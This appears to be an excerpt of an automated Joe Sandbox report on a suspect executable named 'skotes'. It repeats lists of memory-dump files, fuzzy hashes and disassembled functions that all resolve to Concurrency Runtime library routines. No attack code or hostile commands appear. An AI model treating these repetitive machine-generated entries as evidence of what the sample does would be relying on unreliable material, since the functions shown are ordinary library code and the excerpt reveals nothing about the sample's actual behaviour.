Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
Instruction ID: 734eec717fe04ada3b4bcf7b1b1ccceb46d859c39f6a646686bea7d52c1b0365
Opcode Fuzzy Hash: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
Instruction Fuzzy Hash: DFB09236A1B93047CA512B14BC4859E7714AA80B1270A01A6E805A72348A54AD828BDD

Function 0041DD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
Instruction ID: 73b31feacec7ce9fe7b0550b3c6203be5604da4ad9e3037c20952e2b0bfc5a30
Opcode Fuzzy Hash: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
Instruction Fuzzy Hash: E251B0B2D05B068BDB15CF58D8917AAB7F1FB48304F24856BC405EB350E3B8A980CF59

Function 004326D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004326E3

Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004327E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004327F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432846

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction ID: fb03d83531a47042b93fe6564ff1c061b34d3f88821af197b1cf19dfef14ec32
Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction Fuzzy Hash: 6B81C270900249ABDF169F54CA41BBF7BB1AF0D308F04509AEC4127352C7BA8D16DB65

Function 00432970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432982

Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004329A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004329B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004329FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432AD8

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction ID: 2c3f4ac1ddb9b2e884700b4006eb7aadb935b7841f65a9e333380771e6a1d96e
Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction Fuzzy Hash: 8271BC70A00249AFDF15DF54CA80BBFBBB1AF49308F04509AEC416B352C7B9AD16DB65

Function 00422832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422913

Part of subcall function 004207ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229DB

Part of subcall function 004207C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004207DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A7E

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

